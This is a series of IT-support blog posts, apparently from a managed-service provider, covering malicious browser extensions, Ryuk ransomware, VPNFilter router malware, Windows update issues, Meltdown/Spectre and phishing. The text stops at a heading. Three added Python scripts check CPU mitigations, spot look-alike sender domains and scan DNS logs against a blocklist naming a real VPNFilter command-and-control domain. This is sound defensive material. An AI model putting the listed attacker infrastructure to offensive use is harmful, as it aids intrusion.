Protecting Yourself from Browser Extensions

A couple of weeks ago I enjoyed reading The Innovators: How a Group of Hackers, Geniuses, and Geeks Created the Digital Revolution by Walter Isaacson. It’s a worthwhile read. One of the many things that stood out to me is how far web browsers have come from the limited early 90’s Nexus and Mosaic browsers to the browsers we all enjoy today. Modern browsers are so powerful that they are making countless users “operating system agnostic”: whether on a PC, Mac, Linux machine or Chromebook, open a browser and many people are good to go for work and leisure. As is always the case, with this wonderful increased functionality come new risks to your computer’s resources and personal data. Let’s talk about extensions…

What is a browser extension?

Modern web browsers’ functionality can be extended through small programs that the user adds to the browser. These are usually called extensions (Chrome, Firefox, Opera, Safari, Edge) or add-ons (Internet Explorer; Firefox uses both terms). Some extensions provide measurable benefit: for Google G Suite users, adding the G Suite extensions to Chrome enables additional functionality such as offline mode for Google’s online office suite, and countless users rely on Grammarly to catch grammatical faux pas in their emails before they go out. So while some are indisputably useful, many users may be unwittingly running extensions that are working against them.


What’s the Danger?

Extensions give their creator various kinds of access to your browsing, and through it to your accounts and personal data: an extension allowed to “read and change all your data on the websites you visit” sees every page you load, every form you fill in and every session cookie you hold, on every site. The browser web stores vet submissions and remove outright malicious extensions, but the review is not exhaustive, and a once-benign extension can turn malicious after it is sold to a new owner or its update channel is compromised. Whereas many clients are unable to install new programs on their machines without an admin login, extensions install into the user’s own browser profile, so no admin rights are needed and that protective measure is bypassed. When a user reports to us that their system “isn’t quite working right,” we’ll often find a number of (inadvertently installed) browser extensions doing who knows what in the background: redirecting search results, taking over the home page, injecting extra ads, generating pop-ups, or hogging system resources to mine cryptocurrency for the extension’s author on your computer.


Installation Guidance

Before adding an extension to your browser, be sure you can answer yes to all the following questions:

  1. Do I know exactly what this extension does and what kind of data it will have access to? Compare the permissions listed in the install prompt with what the extension claims to do; a “coupon finder” does not need to read your data on all websites. (Be very distrustful of sites that offer a one-click option to add an extension you didn’t know you needed. Please, no.) 
  2. Do I know why I’m adding this extension and what value it will give me?
  3. Do I trust the maker of the extension? (Google is your friend, but if it was unexpectedly suggested to you by a site, be leery.)

In a managed office environment the administrator can go one step further and push a browser policy that blocks every extension except an approved allowlist, so the question never reaches the user.


The Power of Sync

Have you noticed that most modern browsers allow you to log into the browser? This lets you keep things like your browsing history, stored passwords, and auto-fill information consistent with whatever device you happen to be on. This also means if you install an extension on one device, it will often, by design, sync to all your other devices. So the hurt of one careless click can follow you around your digital life, but, thankfully, so can the cleanup.


Cleaning up

We’ll conclude the post with directions for cleaning up the extensions on Chrome, Opera, Firefox, Safari, Edge and Internet Explorer. Once you have navigated to the extension manager, disable, or better, remove, everything listed that you didn’t intentionally add or don’t actually use. For most users, that will mean removing all extensions shown. Because extensions sync, do this while signed in to the browser so the removal propagates to your other devices too. And if one of the extensions was clearly malicious, change the passwords of the accounts you used in that browser while it was installed; an extension with access to all sites could have read them. Enjoy your newly cleaned-up browsing experience!


Google Chrome: 

  • Click the 3-dot settings icon in the top right corner
  • Select “More Tools”
  • Select “Extensions”


  • Select the “Remove” button (the toggle switch only disables)


Opera:

  • Click “View” on the menu bar
  • Select “Show Extensions”


  • Click “Disable” to disable, or the “X” in the top right of the card to remove


Firefox:

  • Click “Tools” on the menu bar
  • Select “Add-ons”


  • Select “Extensions” on the left sidebar
  • Disable or Remove


Safari:

  • Click “Safari” on the menu bar
  • Select “Preferences”
  • Select the “Extensions” icon in the resulting pop-up window


  • Uncheck an extension’s box in the left side panel to disable it
  • Select the extension and click “Uninstall” to remove it


Internet Explorer:

  • Click the settings gear icon in the top right corner of the browser (just below the close window “X”)
  • Select “Manage add-ons”


  • Use the “Enable/Disable” button to toggle (or you can right-click the extension to get the same option)


Microsoft Edge:


  • Click the three horizontal dot settings icon in the top right corner of the browser (just below the close window “X”)
  • Select “Extensions”


  • Use the toggle switch to disable/enable
  • Click the gear icon that appears to the right of the extension card, then “Uninstall” to remove

Photo Credits:

http://www.pexels.com
unsplash.com

 


Ransomware Attacks on the Rise

Ransomware attacks on businesses continue to increase. One particularly nasty attack combination utilizes a trifecta of malware (Emotet, TrickBot, and Ryuk).

How does it start?

  • Often through a phishing email with a malicious attachment or link that infects the user’s computer with the Emotet malware.
  • Emotet opens the door for a second malware, TrickBot, which harvests credentials, spreads across the local network and opens a delivery path for the final payload.
  • Ryuk encrypts key files on targeted machines and servers, demanding a Bitcoin ransom for the decryption key.


The endgame of this attack is Ryuk, a recent ransomware variant becoming infamous for large Bitcoin ransom demands (15–50 BTC). It is derived from an earlier variant dubbed Hermes, which targeted internet-facing servers with weak credentials via RDP. Researchers tracking the spread of Ryuk estimate that it pulled in nearly 4 million dollars in ransoms within the first 5 months of its appearance. (https://duo.com/decipher/the-unholy-alliance-of-emotet-trickbot-and-the-ryuk-ransomware)

 


At present, this three-part attack has been limited to select targets.

This past Christmas, the California-based cloud provider Data Resolution was taken down by this trio, cutting off the roughly 30,000 businesses that depend on its services. About a week later, the Los Angeles Times’ Olympic printing plant was hit, delaying West Coast distribution of the Los Angeles Times, Wall Street Journal and New York Times. (https://www.sdxcentral.com/articles/news/ryuk-ransomware-takes-down-cloud-hosting-providers-systems/2019/01/) Some have suggested the attackers have ties to North Korea (the group behind WannaCry in 2017) because Ryuk shares code with Hermes, which that group has used, but the evidence so far remains inconclusive, and other researchers attribute Ryuk to a Russian-speaking criminal group.

(screenshot of Ryuk’s ransom note)

While it may be a longshot that you will be hit by this specific attack, some simple preventative measures could save you and your company a great deal of heartache later.

Prevention

  • Use reliable antivirus software and keep it updated
  • Beware of suspicious emails (and links)
    • Whatever the From name says, is the actual email address correct?
    • Is it asking for urgent payment, arriving at odd hours, or coming from an unfamiliar private email account?
    • Were you expecting an attachment from this person?
    • Many of our clients have been hit with a much simpler attack: an email sent directly to them claiming to have hacked the client’s email account and recorded embarrassing browser history, and demanding an immediate Bitcoin ransom before sharing that history with all their contacts. (In every case, we were able to determine for them that the threat was overblown and the ransom demand could safely be ignored.) These messages often quote a real old password of yours pulled from a public data breach to seem credible; that password should still be changed wherever you use it, but the “recording” is a bluff. See the example text below:

(image of the scam email text)

  • If you’re unsure, call the person at a known contact number to confirm. Or contact your IT team about questionable emails; they can help you trace a message’s source and reliability.
  • Keep current, tested backups that are stored offline or otherwise out of reach of the machines being backed up, and keep operating systems patched; a victim with a clean backup can restore instead of paying.
  • Ask your IT team whether your network’s firewall supports GeoIP filtering (blocking countries you never do business with) and threat-intelligence blocklists of known malicious IPs. The two are different controls, and both help cut off the malware’s outbound connections.

More info

Re: Ryuk vs Hermes https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/

Re: Ryuk Attack Details https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/

Related posts: https://manhattancomputer.wordpress.com/2017/02/27/protect-yourself-from-costly-email-scams/ https://manhattancomputer.wordpress.com/2017/10/20/phishing-emails-in-detail/

New router malware overview: VPNFilter

A new piece of router malware, VPNFilter, has recently been in the news. A router is the device that connects you to the internet and is often the only thing standing between the internet and your computers. Even without touching your computers, someone who controls the router can monitor the traffic passing through it to capture passwords (on unencrypted connections) and gather other information. The number of affected routers continues to grow; estimates are 500,000 devices (some reports now say possibly as many as a million) across 54 countries, on brands including Netgear, ASUS, Linksys, TP-Link, Ubiquiti and many others. The extent, capabilities and purposes of the malware are being actively investigated. Two weeks ago the FBI seized the domain that the malware’s first stage uses to find its command-and-control servers, but the threat continues to persist and evolve.

 


A Closer Look at Firmware and Microcode

To understand why this particular attack is so troubling, a high-level review of how a device boots will be helpful. Computers, at a very basic level, are simple mathematical devices that process binary numbers (1101001 + 101101, etc.) and are entirely unaware of the complex programs you see on your screen. When the power comes on, a small program stored in a chip on the board, the firmware (the BIOS or UEFI on a PC; a bootloader plus a small embedded Linux on a router), initialises the hardware and loads the operating system. Once the operating system is up, it runs the software programs you interact with on your screen. Microcode sits lower still: it is the processor’s own internal program that turns machine instructions into the steps the circuitry carries out, and it can only be changed by updates signed by the CPU vendor. Neither the firmware nor the microcode is something the antivirus running inside the operating system can see into.

 


Firmware- and Hardware-Level Exploits

All chip-based devices (routers, wifi hotspots, NAS, cellphones, computers, smartwatches, etc.) run firmware and microcode specific to their processors and hardware. When a hack targets these lower levels, it becomes very difficult to detect and remove, because the tools we normally rely on run above it. You may recall Spectre and Meltdown, which were all over the news at the beginning of this year? Those are flaws in the processors’ own design (the way they speculatively execute instructions), affecting nearly all Intel chips made over the last two decades and, in Spectre’s case, AMD and ARM chips as well; because the defect is in the hardware, software patches and microcode updates can only work around it, not truly remove it (read more here). VPNFilter is a different kind of problem: it does not exploit the CPU or the boot firmware, but it gets onto the router’s own Linux-based firmware through known, unpatched vulnerabilities and default credentials, and it modifies the device’s non-volatile configuration so that its first stage comes back after a reboot.

 


How the Attack Works

This attack (named VPNFilter) comes in stages, and the first stage is the most concerning. It adds itself to the device’s non-volatile storage (for example through a crontab entry), so it survives reboots and most removal attempts; its only job is to locate the command-and-control server and fetch stage 2. Stage 2 is the working payload (file collection, command execution, device management, and in some builds a “kill” command that overwrites the firmware and bricks the device), and stage 3 consists of plug-ins such as a packet sniffer that watches for credentials passing through the router and a module that communicates over Tor. Stages 2 and 3 live only in memory. This persistence makes identifying compromised hardware and defending against the attack quite challenging. The FBI has recommended that users reboot their devices. While rebooting does wipe stages 2 and 3, it cannot remove stage 1; but a rebooted stage 1 will try to “phone home” to the domain the FBI now controls, which both keeps it from reloading the other stages and lets the FBI see which devices (and from which IPs) are infected.

Because this malware runs inside the router’s own firmware, below anything your PC’s antivirus can see, you cannot inspect a device from the outside and be sure it is clean. Talos and the vendors recommend a factory reset (which clears the non-volatile storage stage 1 relies on), followed immediately by updating to the latest firmware, changing the default admin password and disabling remote management on the internet side; otherwise the device can simply be reinfected through the same hole. Even then, there is no guarantee that the attackers will not find another way onto the same devices in the future (if they haven’t already), and until a device has been reset and patched it is not safe to leave it internet facing and serving as the router for your company’s business.

 


Firewall Protection

At Manhattan Computer we are monitoring the situation, and as a first response we are removing any affected devices from direct internet access. Our custom firewall is more than enough to protect office networks and devices. Behind our firewall, even if a device were infected, it would have no way to “phone home” and do anything more. Talos Intelligence is actively publishing Snort signatures and indicator lists, which our firewall uses to cut off the connections VPNFilter tries to make.
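One concrete way to see whether anything behind the firewall is still trying to phone home is to run the resolver’s logs against the published indicator list. The script below is an added example, not part of the original post or of Talos’s tooling: it parses dnsmasq-style query logs (the sample lines are constructed) and reports every client that looked up a listed domain or a subdomain of one. The only real indicator in its list is toknowall.com, the stage-1 domain Talos reported and the FBI seized; the second entry is a placeholder, and the real list should be taken from the Talos posts.

```python
"""Scan DNS resolver logs for lookups of known command-and-control domains.

Added example, not part of the original post or of Talos's tooling.
Log format assumed: dnsmasq's default "query[TYPE] name from client".
"""
import re
from collections import defaultdict

# Constructed blocklist: one real VPNFilter indicator plus a placeholder.
BLOCKLIST = {
    "toknowall.com",        # VPNFilter stage-1 C2 domain (Talos, May 2018)
    "c2.example.invalid",   # placeholder entry to show list handling
}

# Constructed sample log; hosts and addresses are made up.
SAMPLE_LOG = """\
May 25 08:12:01 gw dnsmasq[812]: query[A] www.cisco.com from 192.168.1.10
May 25 08:12:03 gw dnsmasq[812]: query[A] toknowall.com from 192.168.1.1
May 25 08:12:03 gw dnsmasq[812]: query[A] update.toknowall.com from 192.168.1.1
May 25 08:13:40 gw dnsmasq[812]: query[AAAA] mail.example.org from 192.168.1.22
May 25 08:14:02 gw dnsmasq[812]: reply toknowall.com is NXDOMAIN
May 25 08:15:00 gw dnsmasq[812]: query[A] C2.Example.Invalid. from 192.168.1.1
"""

QUERY_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ [\d:]+) \S+ dnsmasq\[\d+\]: "
    r"query\[(?P<qtype>[A-Z0-9]+)\] (?P<name>\S+) from (?P<client>[\d.:a-fA-F]+)$"
)


def normalize(name):
    """Lower-case and drop a trailing dot so 'C2.Example.Invalid.' still matches."""
    return name.lower().rstrip(".")


def matches_blocklist(name, blocklist=BLOCKLIST):
    """True if name equals a listed domain or is a subdomain of one."""
    name = normalize(name)
    return any(name == d or name.endswith("." + d) for d in blocklist)


def scan(log_text, blocklist=BLOCKLIST):
    """Return {client_ip: [(timestamp, qtype, name), ...]} for matching queries only."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = QUERY_RE.match(line)
        if not m:
            continue  # replies, cache answers, other daemons
        if matches_blocklist(m["name"], blocklist):
            hits[m["client"]].append((m["ts"], m["qtype"], normalize(m["name"])))
    return dict(hits)


if __name__ == "__main__":
    for client, events in scan(SAMPLE_LOG).items():
        print(f"{client}: {len(events)} lookup(s) of listed domains")
        for ts, qtype, name in events:
            print(f"  {ts}  {qtype:5} {name}")
```

A client that resolves a listed domain is worth pulling off the network for a reset; in the sample, the router itself (192.168.1.1) is the one asking, which is exactly the stage-1 behaviour described above.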

Talos writes: “Defending against this threat is extremely difficult due to the nature of the affected devices. The majority of them are connected directly to the internet, with no security devices or services between them and the potential attackers. This challenge is augmented by the fact that most of the affected devices have publicly known vulnerabilities which are not convenient for the average user to patch. Additionally, most have no built-in anti-malware capabilities. These three facts together make this threat extremely hard to counter, resulting in extremely limited opportunities to interdict malware, remove vulnerabilities, or block threats…. We developed and deployed more than 100 Snort signatures for the publicly known vulnerabilities for the devices that are associated with this threat. These rules have been deployed in the public Snort set, and can be used by anyone to help defend their devices.” (https://blog.talosintelligence.com/2018/06/vpnfilter-update.html)

Firewall support is included in our all service packages http://teksperts.nyc/features/

 

Sources:

For an updated list of devices currently known to be affected see:

https://arstechnica.com/information-technology/2018/06/vpnfilter-malware-infecting-50000-devices-is-worse-than-we-thought/

Note: Cisco is scheduled to release an update on the situation on June 13.

Images from: https://www.pexels.com/

A Brief on the Latest Issues Caused by Windows Update

The status of Windows updates has grown increasingly unpredictable and messy of late. A large part of this relates to the push by both the chip vendors (mostly Intel and AMD) and the operating system makers (Microsoft in particular) to patch the serious CPU vulnerabilities we covered in a previous article. Many of these rushed updates caused immediate problems that far overshadowed the issues they were meant to solve. Initially, Microsoft warned that some users would see serious slowdowns on older chips, but once the vendor patches started rolling out, slowdowns were the least of the problems users faced. Eventually Intel admitted that its initial microcode patches were flawed (they caused unexpected reboots) and asked users to wait until better updates were released.

Update schedules


In years past, Microsoft Windows updates happened at fairly regular intervals: the second (and sometimes fourth) Tuesday of the month. Lately, however, updates have increased dramatically in frequency and number. Some of these updates have been problematic and therefore very disruptive for our clients. For this reason, back in January we began blocking the locally run Windows Update service on our clients’ computers while we monitored the situation. Two weeks ago, a few of our clients found their Windows systems updating even though the service was blocked. For at least one client, this caused some of his USB ports to stop working. Days later Microsoft admitted the mistake: the updates had been pushed through an application called Windows Update Assistant, previously used to upgrade computers from Windows 7 to Windows 10. Though they are calling it an accident, it is actually the third time in four months that something like this has happened.

A Measured Approach to Updates


Given the scope and gravity of the CPU vulnerabilities being addressed, these updates, and the issues springing from them, will likely continue for the foreseeable future. We are monitoring the situation and will continue to roll out proven updates when the time is right rather than on whatever day Microsoft happens to release the next one. Deferral is the goal, not abstention: a machine that never receives the fixes stays exposed to the very flaws the patches address, so a blocked update is a decision to revisit, not to forget.

And Now for Some Good News…

On a more positive note, Microsoft has recently announced that soon updates will run mostly in the background requiring significantly less down time on the user’s side to install. Provided it works as it should, this will be a welcomed change for anyone who has found themselves staring at an update screen when they really needed to be using their computer.


Update on the Recently Revealed CPU Vulnerabilities

CPU security flaw in the news:

  • Various chip manufacturers have acknowledged a security vulnerability which we have detailed below.

What do you need to do?

In this particular case, the onus lies with the chip and operating-system vendors to release patches that shore up security on all these systems. The single most important thing a user can do is make sure your devices are allowed to update. The Windows 10 patch was released last night (Jan 3, 2018); your system should update automatically, and to do so Windows will likely restart your computer this evening. Be aware that over the next several weeks or even months additional security patches will be pushed both to your operating system and to some of your programs (such as Chrome’s update coming on Jan 23rd).

As your technology partner, we will continue to actively monitor the situation and let you know if any additional action needs to be taken.

Additional Background:

How was this vulnerability discovered?
Last year Google’s Security Team, Project Zero, discovered several very serious vulnerabilities in CPU hardware architecture affecting a broad range of modern chips over all kinds of operating systems. Since that time, Google has been working with chip manufacturers and operating system vendors to make a concerted effort to patch or mitigate these vulnerabilities before their presence was made more widely known.

Their planned date for release was January 9th, but yesterday (January 3rd) the information was inadvertently made known. Throughout last night and early this morning, vendors have been rushing to push system and CPU microcode updates to various devices a little earlier than planned. Likely you will be seeing updates on your phone, computers, tablets, etc. in the coming days and weeks. In brief, here is what we know:

What does this do?
The exploits potentially allow a program to read memory it has no right to: Meltdown lets an unprivileged process read the kernel’s memory, and Spectre tricks another process (or the kernel) into leaking its own memory through the CPU’s cache. So, for example, a locally run malicious program (or even malicious JavaScript in a web browser) may be able to scrape sensitive data such as passwords and login details belonging to a separate process on your computer. At present these exploits cannot delete, run or install anything, or otherwise control your computer, but they may be chained with other attacks that use the stolen credentials to go further.

Who is affected?
A couple major hardware vulnerabilities have been discovered that exploit CPUs at the foundational level of their architecture. These vulnerabilities have been given names: Meltdown and Spectre.

  • Meltdown
    • Appears to affect mostly just Intel CPUs produced in the last 20 years
    • It is the most immediate threat and the easiest presently to exploit
    • Vendor updates over the next few days will focus primarily on patching this exploit
  • Spectre
    • A more complex and less understood exploit
    • Affects nearly all modern CPUs (regardless of brand) produced in the last couple decades
    • Though its effect resembles a privilege-escalation vulnerability (reading data you should not be able to), it is really a new class of vulnerability: an information leak through the CPU’s speculative execution
    • The next months and years will continue to see patches designed to mitigate against newly discovered methods of exploiting this vulnerability

While virtually all devices are potential targets, the biggest targets will be the major cloud vendors, since they represent an enormous attack surface (many customers’ workloads sharing the same CPUs) and a very real treasure trove of information. Individual users are far less likely to be the specific mark of such a targeted attack. Of course, even individual users will want to make sure that they are protected as well.

What is being done about it?
Because these are hardware vulnerabilities, and because immediately replacing every computer chip twenty years old and newer is completely unreasonable, they will have to be addressed through operating-system patches and CPU microcode updates. Since addressing a hardware defect with a software update is an imperfect solution, expect continuing development on how best to mitigate these vulnerabilities.
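How do you tell whether those patches have actually landed on a given machine? On Linux the kernel publishes its own verdict, one file per issue, under /sys/devices/system/cpu/vulnerabilities/ (kernel 4.15 and later); on Windows, Microsoft’s SpeculationControl PowerShell module (Get-SpeculationControlSettings) does the same job. The following is an added example, not part of the original post or of any vendor tooling: it reads that sysfs directory when it exists and otherwise falls back to a constructed sample of a half-patched machine, then reports which issues are still unmitigated.

```python
"""Report the Linux kernel's own CPU side-channel mitigation status.

Added example, not part of the original post. Each file under the sysfs
directory holds "Not affected", "Vulnerable[: detail]" or "Mitigation: detail".
"""
import os

SYSFS_DIR = "/sys/devices/system/cpu/vulnerabilities"

# Constructed sample of a partially patched machine. The wording mirrors
# real kernel output, but the machine is made up.
SAMPLE = {
    "meltdown": "Mitigation: PTI",
    "spectre_v1": "Mitigation: __user pointer sanitization",
    # Full spectre_v2 mitigation needs the vendor microcode (IBPB/STIBP);
    # without it the kernel reports what it could and could not enable.
    "spectre_v2": "Vulnerable: Minimal generic ASM retpoline, IBPB: disabled, STIBP: disabled",
    "spec_store_bypass": "Vulnerable",
    "l1tf": "Not affected",
}


def classify(value):
    """Map one status line to 'ok' (not affected or mitigated) or 'vulnerable'."""
    v = value.strip()
    if v.startswith("Not affected") or v.startswith("Mitigation:"):
        return "ok"
    return "vulnerable"  # "Vulnerable", with or without detail, or unknown text


def read_sysfs(directory=SYSFS_DIR):
    """Return {issue: status_line} from sysfs, or {} if this kernel lacks it."""
    if not os.path.isdir(directory):
        return {}
    status = {}
    for name in sorted(os.listdir(directory)):
        with open(os.path.join(directory, name)) as fh:
            status[name] = fh.read().strip()
    return status


def summarize(status):
    """Return (sorted names of unmitigated issues, {issue: 'ok'|'vulnerable'})."""
    verdicts = {issue: classify(line) for issue, line in status.items()}
    bad = sorted(i for i, v in verdicts.items() if v == "vulnerable")
    return bad, verdicts


if __name__ == "__main__":
    live = read_sysfs()
    status = live or SAMPLE
    print("source:", "live sysfs" if live else "constructed sample (no sysfs here)")
    bad, verdicts = summarize(status)
    for issue in sorted(status):
        print(f"  {verdicts[issue]:10} {issue}: {status[issue]}")
    print("needs attention:", ", ".join(bad) if bad else "none")
```

A “Vulnerable” spectre_v2 line on an otherwise patched kernel usually means the CPU microcode update has not arrived yet, which is exactly the case where the OS patch alone is not enough.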

As an additional level of defense for your business, our custom firewalls (which we actively monitor) are set up specifically to block malicious access from continuously updated lists of IP addresses reported. Click here for more information on this service.

Further Reading:

Google’s Project Zero’s official announcement on the technical details of the vulnerabilities: https://googleprojectzero.blogspot.com/2018/01/reading-privileged-memory-with-side.html

Slide images taken from Intel’s Report on the Side Channel Analysis Security Issue: https://s21.q4cdn.com/600692695/files/doc_presentations/2018/Side-Channel-Analysis-Security.pdf

Anandtech’s continued coverage of new developments on the issue: https://www.anandtech.com/show/12214/understanding-meltdown-and-spectre

Phishing Emails in Detail

Over the last couple of months malicious or fraudulent emails, also known as phishing emails, have been on the rise in the US. These emails attempt to trick users into opening a malicious webpage or file and are usually disguised as a legitimate message. Some examples:

  • Emails saying that your scanned documents are attached.
  • Warnings that your mailbox is running out of space, directing you to urgently click the link provided and enter your email password.
  • Email from a co-worker (especially a boss) asking you to pay the attached invoice ASAP.


What are these messages and where do they come from?

Hackers break into someone’s computer or server somewhere in the world and gain full control of it. They then use that computer to send emails to different recipients, as if the person who uses it had sent them. The legitimate owner is usually completely unaware that his computer is sending emails, and the hijacker has made sure he will not be traced. The hijacked computer could be yours (your home computer, for example). Many campaigns are also sent from rented bulk-mail infrastructure, which is why the sending server alone proves little about who is behind a message.

Most of the time these malicious emails spoof the sender so the message appears to come from someone you know. For example, gary@manhattan.net receives an email “from” mike@manhattan.net with some request or a link to open. Our company uses DMARC (Domain-based Message Authentication, Reporting and Conformance), which builds on SPF and DKIM and tells receiving mail servers to reject mail that claims a From address at manhattan.net but was neither sent through the servers we authorise nor signed with our key. This approach not only protects you from receiving phishing emails masquerading as messages from your coworkers (provided the receiving server enforces the policy), it also helps other businesses determine which emails are legitimately coming to them from your company. It does nothing, however, about mail sent from a different domain that merely looks like yours, which is the next trick.


How Do These Emails Get through My Email Service Provider’s Filters?

A growing percentage of phishing emails use a character-substitution technique: Unicode characters that look like ordinary letters, placed in the sender’s domain. For example, mike@manhattąn.net, with ą being a different character from “a”, though hardly noticeable. Such an email passes SPF, DKIM and DMARC, because manhattąn.net is a different domain, registered and controlled by the attacker, and the protection on manhattan.net says nothing about it. Depending on how good the email provider’s spam filtering is, the message might still be filtered and/or marked as spam. Reputable providers like Microsoft and Google still struggle to identify every phishing email as the techniques keep morphing, and will eventually let some through to your inbox. Other providers, such as Yahoo and AOL mail, are far less capable, and users’ inboxes end up swamped with spam and phishing emails. A useful habit is to look at the actual address rather than the display name, and to be suspicious of any domain your mail client shows with an “xn--” prefix, which is how a domain containing non-ASCII characters is encoded on the wire.
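The two checks above, “whatever the From name says, is the actual address correct?” from the phishing bullets in the ransomware post and the look-alike-domain trick described here, can be automated against a mail header. The following is an added example, not code from the original post or from any mail provider: it parses a From header, reports when the display name carries an address different from the real one, shows the punycode form of a non-ASCII domain, and folds look-alike characters to ASCII to detect a domain that resembles a trusted one. The trusted-domain list, the small hand-made look-alike table (Unicode’s confusables.txt is the authoritative source) and the sample headers are assumptions for the example.

```python
"""Flag spoofed display names and look-alike sender domains in a From: header.

Added example, not code from the original post. TRUSTED, the MANUAL table
and the sample headers are constructed for the example.
"""
import unicodedata
from email.utils import parseaddr

TRUSTED = {"manhattan.net"}

# Look-alikes that NFKD cannot reduce (no decomposition), mapped by hand.
# A small assumed table; Unicode's confusables.txt is the full list.
MANUAL = {
    "\u0131": "i",  # dotless i
    "\u03bf": "o",  # Greek omicron
    "\u043e": "o",  # Cyrillic o
    "\u0430": "a",  # Cyrillic a
    "\u0435": "e",  # Cyrillic e
    "\u0441": "c",  # Cyrillic es
    "\u0440": "p",  # Cyrillic er
    "\u0445": "x",  # Cyrillic ha
}


def skeleton(domain):
    """Fold accents and look-alike letters to plain ASCII.

    NFKD splits 'ą' into 'a' + combining ogonek; dropping combining marks
    leaves 'a'. Characters with no decomposition go through MANUAL.
    """
    out = []
    for ch in unicodedata.normalize("NFKD", domain.lower()):
        if unicodedata.combining(ch):
            continue
        out.append(MANUAL.get(ch, ch))
    return "".join(out)


def analyze_from(header_value, trusted=TRUSTED):
    """Return {'display', 'address', 'domain'?, 'punycode'?, 'warnings': [...]}."""
    display, addr = parseaddr(header_value)
    findings = {"display": display, "address": addr, "warnings": []}
    if "@" not in addr:
        findings["warnings"].append("no parsable address")
        return findings
    domain = addr.rsplit("@", 1)[1].lower()
    findings["domain"] = domain

    # 1. The display name itself contains an address that is not the real one.
    _, inner = parseaddr(display)
    if "@" in inner and inner.lower() != addr.lower():
        findings["warnings"].append(f"display name claims {inner}, header is {addr}")

    # 2. Non-ASCII domain: show the form DNS actually sees (xn--...).
    if not domain.isascii():
        try:
            findings["punycode"] = domain.encode("idna").decode("ascii")
        except UnicodeError:
            findings["punycode"] = "(not a valid internationalized domain)"
        findings["warnings"].append("domain contains non-ASCII characters")

    # 3. Folds to a trusted domain but is not actually that domain.
    folded = skeleton(domain)
    if domain not in trusted and folded in trusted:
        findings["warnings"].append(f"look-alike of trusted domain {folded}")
    return findings


if __name__ == "__main__":
    samples = [  # constructed headers
        "Mike <mike@manhattan.net>",
        "Mike <mike@manhatt\u0105n.net>",
        '"mike@manhattan.net" <billing@mail-relay.example>',
        "Mike <mike@m\u0430nhattan.net>",
    ]
    for header in samples:
        result = analyze_from(header)
        print(header, "->", result["warnings"] or "ok")
```

The same folding can be applied to a domain in a link before you click it; the third sample shows the pattern where a mail client displays only the quoted part and the real address sits out of sight.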


Does a Malicious Email Mean my Computer or Network is Insecure?

When your computer gets an email, it is downloading that email from your email service provider’s server. Even though your network is protected from attacks by your firewall and your computer is protected by your antivirus, your computer downloads the phishing email because your email provider’s server is, by default, a trusted location.

Few realize that even Microsoft or Google may pass phishing emails along to your computer. Although the big providers are trying to block those emails, the people sending them are always working to stay one step ahead, so some will continue to get through. If you open such an email (and especially an attachment it includes), even with current antivirus the content might still be able to take over your computer and lock, access or delete your files. If you follow a fake link in the email (like chàse.com), you risk handing hackers your login and password by typing them into the inauthentic bank site you are directed to.

Protecting Yourself

Check with your tech security guys and/or your IT provider to explore what measures are in place to protect your business from phishing emails. Ask if they will provide instructions and alerts for your users regarding such activity and ever-evolving cyber threats. Have them give you specific recommendations regarding measures to prevent your business and home computers from being hijacked.

As a security and technology service provider we are the first point of information for our clients regarding phishing emails. Learn more at teksperts.nyc/features

 

All images come from pixabay.com: “Pixabay is a vibrant community of creatives, sharing copyright free images and videos. All contents are released under Creative Commons CC0, which makes them safe to use without asking for permission or giving credit to the artist – even for commercial purposes.”

Confronting the Myth that Proprietary Systems are Safer than Open-Source

Many have the impression that open-source software is less secure than its proprietary counterparts. While there are many factors behind this assumption, three tend to loom large in people’s thinking. This article will highlight these three misunderstandings, note two additional factors where proprietary systems are uniquely vulnerable, and conclude by recommending a viable solution for the security-conscious small business.

1. Misunderstanding “open-source”:


Some confusion persists regarding what “open-source” means or implies. Unlike say “an open door policy,” open-source does not imply that intruders are given free or easy access past the security measures the software utilizes to keep a business secure.  “Open-source” simply means that anyone is able to freely review the software’s code and suggest improvements to it. (For a fuller explanation of what open-source entails see: here)

2. Supposed dangers of code being open to all:


Understanding this, some still fear that because all the code is accessible to a would-be attacker, it would make his job easier to spot holes in the code that he could successfully exploit. While this is not impossible, there are other factors to consider. For one, many thousands of other eyes are reviewing the same code to find, report and close those loopholes via patches before they can be successfully exploited. (Many eyes are not a guarantee, though: Heartbleed sat in OpenSSL for about two years before anyone noticed. The advantage is that anyone can look, and that the fix itself can be reviewed, not that every bug is found quickly.)

3. Always patching:


Patches, in theory, can also be a cause for misunderstanding. You may overhear someone saying that they just don’t trust software that seems to always be in need of patching. While this might sound bad at first (who wants to own a car that is subject to constant recalls?), in the software world this can be a very good thing. Particularly for widely used software, the open-source community is well-known for the speed at which it can push through needful fixes of just-discovered vulnerabilities.

Mark Cox, a leader of the Red Hat Security Response Team, notes:

“A good example of reaction time was with a Linux kernel flaw. On Saturday, 9 February, an exploit was made public that allowed a local unprivileged user to gain root privileges on some Linux kernels (CVE-2008-0600). Within a few hours of it being reported to the kernel mailing list, on 10 February, patches were being exchanged and tested. Later the same day the patches were committed and a new upstream kernel version was released.” (Source)

In addition to these misunderstandings, commercial products are not as secure as their sales marketing team would have you believe. Two additional factors should be considered when evaluating commercial products compared to their open-source counterparts:

1. Leaked Proprietary Source Code


The common assumption is that if you keep your source code locked up, it is far harder for hackers to exploit your product than to find and exploit vulnerabilities in publicly available source code. We have already addressed how the open-source community uses the open nature of its code as a built-in check to continually improve its security. Commercial software does not have this check. Maybe that would be fine if the vendor could absolutely assure you that its source code will never, ever be leaked… except that it does leak, again and again. Even some of the biggest players in commercial software (Microsoft, Symantec, Adobe, Kaspersky, VMware, etc.) have repeatedly had their most closely guarded product code leaked. Suddenly the argument that secrecy makes the product more secure turns on its head: now it is primarily malicious eyes poring over the code looking for ways to exploit the product, while the vendor is left mostly to its own paid employees to stem the tide. (Attackers do not even need the source to find bugs; binaries are reverse engineered routinely, which is why secrecy of the code was never a strong defence to begin with.)

2. Delay or Negligence in Pushing Released Patches to their Product


